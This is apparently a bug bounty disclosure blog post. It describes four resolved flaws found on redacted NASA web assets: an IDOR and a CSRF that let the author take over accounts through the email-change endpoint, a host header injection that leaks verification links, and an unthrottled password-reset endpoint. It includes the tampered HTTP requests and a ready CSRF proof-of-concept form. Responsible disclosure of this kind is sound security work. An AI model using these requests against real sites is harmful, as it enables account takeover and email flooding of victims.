Account Takeovers & more : Hacking NASA

I received 3 letters of appreciation from NASA for finding multiple potential Security vulnerabilities in their systems. In this blog post, I’ll explain all the technical part and non-technical parts of it.

My Approach?

1 - I decided to look for Access Control, IDOR’s, Authentication Issues. So, for that, I need functional assets that have some functionalities that need to be broken.

2 - Hence, I used very basic Google Dorks to find those assets, as a result found some of them.

3 - As a result discovered & reported several security vulnerabilities to NASA (P1,P2,P3,P4).

1 - IDOR leads to 0-Click Account Takeover

P1 : Resolved

• Discovered that the Email Change functionality at █████.pps.eosdis.nasa.gov is vulnerable to IDOR.
• Yeah, so now it was pretty much very simple to change your email to some other existing user email.
• Create to account, Account-A(attacker) & Account-B(victim)
• Go to Account A, Change the email, and Intercept the request.

Request

POST /registration/updateEmailRequest.html HTTP/1.1
Host: █████.pps.eosdis.nasa.gov
Cookie: {your-cookie};
Content-Length: 89
...snip...
Connection: close

oldEmail=attacker%40email.com&email=test%40email.com&confirmEmail=test%40email.com

• Change the Old_email parameter to Account-B(victim) email

  oldEmail=victim%40email.com&email=test%40email.com&confirmEmail=test%40email.com
  

• Observe that the application changed the email of Account B(victim)

Host Header Injection

P2 : Resolved

• Discovered a Host Header Injection on the Email Verification feature.
• Register on █████.pps.eosdis.nasa.gov & Click on Verify Email.
• Intercept the Request, Change the

Host: █████.pps.eosdis.nasa.gov with Host: your-collaborator-id.oastify.com

You’ll receive the verification link in your email as:

https://yourburpcollaborator-is.oastify.com/registration/verifyContact/verification-token/attacker@email.com.html

• As an attacker, I could verify an account with any user email (belonging to individuals who do not intend to have an account on this web app) such as @nasa.gov.

CSRF leads to 1-Click Account Takeover

P3 : Resolved

• This is another report regarding the same endpoint(case-1), which is the Change Email function. Previously, I discovered the IDOR on the same endpoint. In this report, I found that an attacker can perform a CSRF Attack on the Email Change functionality, allowing them to take over any user’s account.
• Login █████.pps.eosdis.nasa.gov & Navigate to Update Info Page. Enable an HTTP interception proxy, such as Burp Suite.
• Change the email and Intercept the request. Generate the CSRF PoC.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/');</script>
    <h1>MAGIC HAPPENS, IF YOU CLICK THE BELOW BUTTON..!!</h1>
    <form action="https://█████.pps.eosdis.nasa.gov/registration/updateEmailRequest.html" method="POST">
      <input type="hidden" name="oldEmail" value="victim&#64;email&#46;com" />
      <input type="hidden" name="email" value="hacked&#64;email&#46;com" />
      <input type="hidden" name="confirmEmail" value="hacked&#64;email&#46;email" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

• Test it in the browser. The email will change & the verification goes to the attacker-controlled email.

No Rate Limit on Forget-Password

P4 : Resolved

• Lack of rate limiting on an email triggering endpoint (forget-password) was identified. This allows an attacker to create a large amount of emails to any email address, which they could use to spam a target with emails.
• Navigate to █████.hec.nasa.gov/account/recover/pwd , enter the email then click Reset Password
• Intercept this request in the burp suite, the HTTP request looks like

POST /rms/apis/public/account/recover HTTP/1.1
Host: █████.hec.nasa.gov
Cookie: YOUR_SESSION_COOKIES
...snip...
Connection: close

{
    "username":"victim_user",
    "email":"victim@email.com"}

• Send it to the Intruder and Under the Payload Section choose payload as null payloads and generate 50 payloads

• You will receive 200 OK in response, you can also check your mail inbox.
• Systems that use Software-as-a-Service (SaaS) email providers, there can be direct financial costs associated with sending large volumes of email. Triggers emails can result in reputational damage for the organization as user’s trust is impacted through receiving large amounts of unwanted and unsolicited emails.

Conclusion

It took me about 30 min to find these vulnerabilities in one asset. I didn’t perform so much recon, automation ..etc. Just picked up one asset from Google dorks & Started hacking on it. And the vulnerabilities are pretty much very simple & straightforward.

Timeline

• Reported -> 03/July/2024
• Triaged -> 04/July/2024
• Resolved -> 25/July/2024
• Received letter of Appreciation -> 29/July/2024

Twitter  facebook  Email